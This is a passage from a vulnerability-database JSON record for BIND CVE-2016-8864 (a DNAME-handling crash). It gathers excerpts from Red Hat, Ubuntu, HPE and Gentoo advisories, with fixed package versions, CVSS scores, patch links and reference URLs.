6.7):\n\nSource:\nbind-9.8.2-0.37.rc1.el6_7.9.src.rpm\n\ni386:\nbind-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.9.i686.rpm\n\nppc64:\nbind-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.9.ppc.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm\n\ns390x:\nbind-9.8.2-0.37.rc1.el6_7.9.s390x.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.9.s390x.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390x.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.9.s390.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.9.s390x.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.9.s390x.rpm\n\nx86_64:\nbind-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.2):\n\nSource:\nbind-9.7.3-8.P3.el6_2.6.src.rpm\n\nx86_64:\nbind-debuginfo-9.7.3-8.P3.el6_2.6.i686.rpm\nbind-debuginfo-9.7.3-8.P3.el6_2.6.x86_64.rpm\nbind-devel-9.7.3-8.P3.el6_2.6.i686.rpm\nbind-devel-9.7.3-8.P3.el6_2.6.x86_64.rpm\nbind-sdb-9.7.3-8.P3.el6_2.6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.4):\n\nSource:\nbind-9.8.2-0.17.rc1.el6_4.10.src.rpm\n\nx86_64:\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.10.i686.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm\nbind-devel-9.8.2-0.17.rc1.el6_4.10.i686.rpm\nbind-devel-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm\nbind-sdb-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.5):\n\nSource:\nbind-9.8.2-0.23.rc1.el6_5.5.src.rpm\n\nx86_64:\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.5.i686.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-devel-9.8.2-0.23.rc1.el6_5.5.i686.rpm\nbind-devel-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-sdb-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 6.5):\n\nSource:\nbind-9.8.2-0.23.rc1.el6_5.5.src.rpm\n\nx86_64:\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.5.i686.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-devel-9.8.2-0.23.rc1.el6_5.5.i686.rpm\nbind-devel-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-sdb-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.6):\n\nx86_64:\nbind-debuginfo-9.8.2-0.30.rc1.el6_6.7.i686.rpm\nbind-debuginfo-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-devel-9.8.2-0.30.rc1.el6_6.7.i686.rpm\nbind-devel-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-sdb-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 6.6):\n\nx86_64:\nbind-debuginfo-9.8.2-0.30.rc1.el6_6.7.i686.rpm\nbind-debuginfo-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-devel-9.8.2-0.30.rc1.el6_6.7.i686.rpm\nbind-devel-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-sdb-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 6.7):\n\ni386:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.9.i686.rpm\n\nppc64:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.9.ppc.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm\n\ns390x:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390x.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.9.s390.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.9.s390x.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.9.s390x.rpm\n\nx86_64:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-8864\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://kb.isc.org/article/AA-01434\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFYRlsfXlSAg2UNWIIRAmy8AJ9xFyJSMmX2XN+lcWzsNNQT7cfR8QCggVOj\nKpG5DRbXaKAdrUMg5IeIS+s=\n=aWJX\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n===========================================================================\nUbuntu Security Notice USN-3119-1\nNovember 01, 2016\n\nbind9 vulnerability\n===========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.10\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nBind could be made to crash if it received specially crafted network\ntraffic. \n\nSoftware Description:\n- bind9: Internet Domain Name Server\n\nDetails:\n\nTony Finch and Marco Davids discovered that Bind incorrectly handled\ncertain responses containing a DNAME answer. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.10:\n  bind9                           1:9.10.3.dfsg.P4-10.1ubuntu1.1\n\nUbuntu 16.04 LTS:\n  bind9                           1:9.10.3.dfsg.P4-8ubuntu1.2\n\nUbuntu 14.04 LTS:\n  bind9                           1:9.9.5.dfsg-3ubuntu0.10\n\nUbuntu 12.04 LTS:\n  bind9                           1:9.8.1.dfsg.P1-4ubuntu0.19\n\nIn general, a standard system update will make all the necessary changes. \n\nBug Fix(es):\n\n* ICANN is planning to perform a Root Zone DNSSEC Key Signing Key (KSK)\nrollover during October 2017. Maintaining an up-to-date KSK is essential\nfor ensuring that validating DNS resolvers continue to function following\nthe rollover. (BZ#1459648)\n\n4. \n\nRelease Date: 2017-01-27\nLast Updated: 2017-01-27\n\nPotential Security Impact: Remote: Denial of Service (DoS)\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in the HP-UX BIND service running named. These vulnerabilities could be exploited remotely to create multiple Denial of Services (DoS). \n\n  - HP-UX BIND B.11.31 - BIND 9.9.4 prior to C.9.9.4.9.0\n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2016-8864\n      7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2016-9131\n      7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2016-9444\n      7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has provided the following software updates to resolve the vulnerability in the HP-UX BIND service running named.  \n\n  * BIND 9.9.4 for HP-UX Release B.11.31 (PA and IA)\n  * Depot: HP_UX_11.31_HPUX-NameServer_C.9.9.4.9.0_HP-UX_B.11.31_IA_PA.depot\n\nNote: The depot files can be found here:\n\u003chttps://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumb\nr=BIND\u003e\n\n    MANUAL ACTIONS: Yes - Update \n    Download and install the software update\n     \n    PRODUCT SPECIFIC INFORMATION \n    HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application \n    that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins \n    issued by HPE and lists recommended actions that may apply to a specific HP-UX \n    system. It can also download patches and create a depot automatically. \nFor more information see:\n   \n\u003chttps://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumb\nr=B6834AA\u003e\n    The following text is for use by the HP-UX Software Assistant. \n\n    AFFECTED VERSIONS\n\n    HP-UX B.11.31 IA/PA \n    =================== \n    NameService.BIND-AUX \n    NameService.BIND-RUN \n    action: install C.9.9.4.9.0 or subsequent\n\nHISTORY\nVersion:1 (rev.1) - 28 January 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in the title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll BIND users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-dns/bind-9.10.4_p4\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-8864\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8864\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201701-26\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. 6) - i386, x86_64\n\n3",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8864"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005674"
      },
      {
        "db": "BID",
        "id": "94067"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8864"
      },
      {
        "db": "PACKETSTORM",
        "id": "139496"
      },
      {
        "db": "PACKETSTORM",
        "id": "139541"
      },
      {
        "db": "PACKETSTORM",
        "id": "140046"
      },
      {
        "db": "PACKETSTORM",
        "id": "139461"
      },
      {
        "db": "PACKETSTORM",
        "id": "143169"
      },
      {
        "db": "PACKETSTORM",
        "id": "140943"
      },
      {
        "db": "PACKETSTORM",
        "id": "140436"
      },
      {
        "db": "PACKETSTORM",
        "id": "139497"
      }
    ],
    "trust": 2.7
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8864",
        "trust": 3.6
      },
      {
        "db": "ISC",
        "id": "AA-01434",
        "trust": 2.5
      },
      {
        "db": "BID",
        "id": "94067",
        "trust": 2.0
      },
      {
        "db": "ISC",
        "id": "AA-01435",
        "trust": 1.7
      },
      {
        "db": "ISC",
        "id": "AA-01437",
        "trust": 1.7
      },
      {
        "db": "ISC",
        "id": "AA-01436",
        "trust": 1.7
      },
      {
        "db": "ISC",
        "id": "AA-01438",
        "trust": 1.7
      },
      {
        "db": "SECTRACK",
        "id": "1037156",
        "trust": 1.7
      },
      {
        "db": "JVN",
        "id": "JVNVU92683474",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005674",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-898",
        "trust": 0.6
      },
      {
        "db": "JUNIPER",
        "id": "JSA10785",
        "trust": 0.3
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8864",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139496",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139541",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "140046",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139461",
        "trust": 0.1
      },
      {
        "db": "ISC",
        "id": "AA-01440",
        "trust": 0.1
      },
      {
        "db": "ISC",
        "id": "AA-01441",
        "trust": 0.1
      },
      {
        "db": "ISC",
        "id": "AA-01466",
        "trust": 0.1
      },
      {
        "db": "ISC",
        "id": "AA-01439",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143169",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "140943",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "140436",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139497",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-8864"
      },
      {
        "db": "BID",
        "id": "94067"
      },
      {
        "db": "PACKETSTORM",
        "id": "139496"
      },
      {
        "db": "PACKETSTORM",
        "id": "139541"
      },
      {
        "db": "PACKETSTORM",
        "id": "140046"
      },
      {
        "db": "PACKETSTORM",
        "id": "139461"
      },
      {
        "db": "PACKETSTORM",
        "id": "143169"
      },
      {
        "db": "PACKETSTORM",
        "id": "140943"
      },
      {
        "db": "PACKETSTORM",
        "id": "140436"
      },
      {
        "db": "PACKETSTORM",
        "id": "139497"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-898"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005674"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8864"
      }
    ]
  },
  "id": "VAR-201611-0348",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.452724815
  },
  "last_update_date": "2026-04-10T22:30:01.219000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "CVE-2016-8864: A problem handling responses containing a DNAME answer can lead to an assertion failure",
        "trust": 0.8,
        "url": "https://kb.isc.org/article/AA-01434"
      },
      {
        "title": "ISC BIND Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=65217"
      },
      {
        "title": "Red Hat: Important: bind security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162615 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: bind security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162141 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: bind security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162871 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: bind97 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162142 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: bind security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20171583 - Security Advisory"
      },
      {
        "title": "Ubuntu Security Notice: bind9 vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3119-1"
      },
      {
        "title": "Debian Security Advisories: DSA-3703-1 bind9 -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=25170e4c26eb5596b991447b2fe3f73c"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201611-3] bind: denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-201611-3"
      },
      {
        "title": "Debian Security Advisories: DSA-3795-1 bind9 -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=e9e51aab92f45f9d888ad1ffc92c4f3d"
      },
      {
        "title": "Debian CVElist Bug Report Logs: bind9: CVE-2017-3135: Assertion failure when using DNS64 and RPZ can lead to crash",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=81f60d35c70eaa48875e5b7abedb8f93"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2016-768",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2016-768"
      },
      {
        "title": "Red Hat: CVE-2016-8864",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2016-8864"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2016-8864"
      },
      {
        "title": "Debian CVElist Bug Report Logs: bind9: CVE-2016-6170: Improper restriction of zone size limit",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=e02ec149f48761d28abbc8f9e7aa9438"
      },
      {
        "title": "Debian CVElist Bug Report Logs: bind9: CVE-2016-8864: A problem handling responses containing a DNAME answer can lead to an assertion failure",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=242cf61148134d5daf6c6f211f3dc7b2"
      },
      {
        "title": "Debian CVElist Bug Report Logs: bind9: CVE-2016-2775: A query name which is too long can cause a segmentation fault in lwresd",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=203ff59e2f48888eafac702f965368d2"
      },
      {
        "title": "Debian CVElist Bug Report Logs: bind9: CVE-2016-9147: An error handling a query response containing inconsistent DNSSEC information could cause an assertion failure",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=1b1bb9752a4b7727509a33fc1bcf30af"
      },
      {
        "title": "Debian CVElist Bug Report Logs: bind9: CVE-2016-9444: An unusually-formed DS record response could cause an assertion failure",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=da9e0b6af817aa72c070683e0bb02db7"
      },
      {
        "title": "Debian CVElist Bug Report Logs: bind9: CVE-2016-9131: A malformed response to an ANY query can cause an assertion failure during recursion",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=9d0264b02e692c0714293a515e15b50a"
      },
      {
        "title": "Debian CVElist Bug Report Logs: bind9: CVE-2016-2776: Assertion failure in query processing",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=fdfc8fe346679f9224f550ec67083216"
      },
      {
        "title": "Forcepoint Security Advisories: CVE-2016-8864 BIND Security Vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=4a067339d3ba130473f82866197373b9"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=586e6062440cdd312211d748e028164e"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6839c4d3fd328571c675c335d58b5591"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=21c0efa2643d707e2f50a501209eb75c"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf"
      },
      {
        "title": "check_debsecan",
        "trust": 0.1,
        "url": "https://github.com/AMD1212/check_debsecan "
      },
      {
        "title": "Vision",
        "trust": 0.1,
        "url": "https://github.com/CoolerVoid/Vision "
      },
      {
        "title": "Vision2",
        "trust": 0.1,
        "url": "https://github.com/CoolerVoid/Vision2 "
      },
      {
        "title": "bind9",
        "trust": 0.1,
        "url": "https://github.com/ALTinners/bind9 "
      },
      {
        "title": "balabit-os-7-bind9",
        "trust": 0.1,
        "url": "https://github.com/balabit-deps/balabit-os-7-bind9 "
      },
      {
        "title": "os-bind9",
        "trust": 0.1,
        "url": "https://github.com/pexip/os-bind9 "
      },
      {
        "title": "rhsecapi",
        "trust": 0.1,
        "url": "https://github.com/RedHatOfficial/rhsecapi "
      },
      {
        "title": "cve-pylib",
        "trust": 0.1,
        "url": "https://github.com/RedHatProductSecurity/cve-pylib "
      },
      {
        "title": "The Register",
        "trust": 0.1,
        "url": "https://www.theregister.co.uk/2017/04/13/monster_patch_day_for_juniper/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-8864"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-898"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005674"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-617",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-Other",
        "trust": 0.8
      },
      {
        "problemtype": "CWE-20",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005674"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8864"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.5,
        "url": "https://kb.isc.org/article/aa-01434"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2871.html"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2615.html"
      },
      {
        "trust": 1.8,
        "url": "https://security.gentoo.org/glsa/201701-26"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2017:1583"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2142.html"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2141.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/94067"
      },
      {
        "trust": 1.7,
        "url": "https://kb.isc.org/article/aa-01438"
      },
      {
        "trust": 1.7,
        "url": "https://kb.isc.org/article/aa-01437"
      },
      {
        "trust": 1.7,
        "url": "https://kb.isc.org/article/aa-01436"
      },
      {
        "trust": 1.7,
        "url": "https://kb.isc.org/article/aa-01435"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2016/dsa-3703"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05381687"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1037156"
      },
      {
        "trust": 1.7,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-16:34.bind.asc"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20180926-0005/"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-8864"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8864"
      },
      {
        "trust": 0.8,
        "url": "https://www.jpcert.or.jp/at/2016/at160044.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.nic.ad.jp/ja/topics/2016/20161102-01.html"
      },
      {
        "trust": 0.8,
        "url": "https://jprs.jp/tech/security/2016-11-02-bind9-vuln-dname.html"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu92683474/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8864"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2016-8864"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05381687"
      },
      {
        "trust": 0.3,
        "url": "http://www.isc.org/products/bind/"
      },
      {
        "trust": 0.3,
        "url": "https://support.f5.com/kb/en-us/solutions/public/k/35/sol35322517.html?sr=59127107"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10785\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024402"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/bind_advisory14.asc"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21994505"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9131"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9444"
      },
      {
